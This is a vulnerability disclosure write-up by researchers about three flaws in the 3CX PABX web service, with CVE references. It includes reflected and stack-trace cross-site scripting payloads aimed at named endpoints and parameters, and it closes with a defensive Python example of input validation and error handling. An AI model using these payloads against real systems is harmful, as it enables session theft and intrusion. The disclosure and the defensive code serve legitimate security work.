Security Issues in the 3CX Web Service

I’m Edward Toledano, a security researcher at STOLabs. My coworkers Ricardo Fajin, Daniel Chactoura, Lucas Carmo and Kelvin Clark and I found some issues in the famous 3CX PABX.

The issues found:

  1. Multiple Improper Error Handling
  2. Reflected Cross-Site Scripting
  3. Cross-Site Scripting in Stack Trace

1) Multiple Improper Error Handling

While researching the application we found several traceback errors, such as the one shown below. This can be especially dangerous because it discloses several pieces of information about the server itself.

Evidence of the stack trace

2) Reflected Cross-Site Scripting

URL: https://<IP>:<Port>/api/CallLog?TimeZoneName=<script>alert(document.cookie)</script>&callState=All&dateRangeType=Today&fromFilter=&fromFilterType=Any&numberOfRows=200&searchFilter=&startRow=0&toFilter=&toFilterType=Any

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: TimeZoneName

Evidence of the reflected XSS

3) Cross-Site Scripting in Stack Trace

URL: https://<ip>:5001/#/app/ivr_editor/4

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: propertyPath

Evidence of the stack trace XSS 1
Evidence of the stack trace XSS 2
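
Server-side handling that closes all three findings, as an added example that is not 3CX code and not part of the original write-up: the parameter is validated before use, a rejected value is never echoed, and unhandled errors return an incident ID while the trace stays in the server log. The function names, the response shape and the accepted character set for time zone names are assumptions.

```python
import html
import logging
import re
import uuid

log = logging.getLogger("api")

# Assumption: time zone names look like "America/Sao_Paulo" or
# "E. South America Standard Time"; the page does not state the format.
TZ_NAME = re.compile(r"[A-Za-z0-9 ._+/()-]{1,64}")


class BadParameter(Exception):
    """Raised with the parameter name only, never the submitted value."""
    def __init__(self, name):
        super().__init__(name)
        self.name = name


def parse_timezone(params):
    value = params.get("TimeZoneName", "")
    if not isinstance(value, str) or not TZ_NAME.fullmatch(value):
        raise BadParameter("TimeZoneName")
    return value


def handle_call_log(params, query=lambda tz: []):
    """Hypothetical /api/CallLog handler returning (status, json_body)."""
    try:
        tz = parse_timezone(params)
        return 200, {"timeZone": tz, "rows": query(tz)}
    except BadParameter as exc:
        # The name is a server-side constant; the rejected value is not reflected.
        return 400, {"error": f"invalid parameter: {exc.name}"}
    except Exception:
        incident = uuid.uuid4().hex
        # Full traceback goes to the server log only; the client gets an ID.
        log.exception("unhandled error, incident=%s", incident)
        return 500, {"error": "internal error", "incident": incident}


def render_error_html(message):
    # If an error page must display request-derived text, HTML-encode it first.
    return "<pre>" + html.escape(message, quote=True) + "</pre>"
```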

CVEs Related to this article:

CVE-2018-14905

CVE-2018-14906

CVE-2018-14907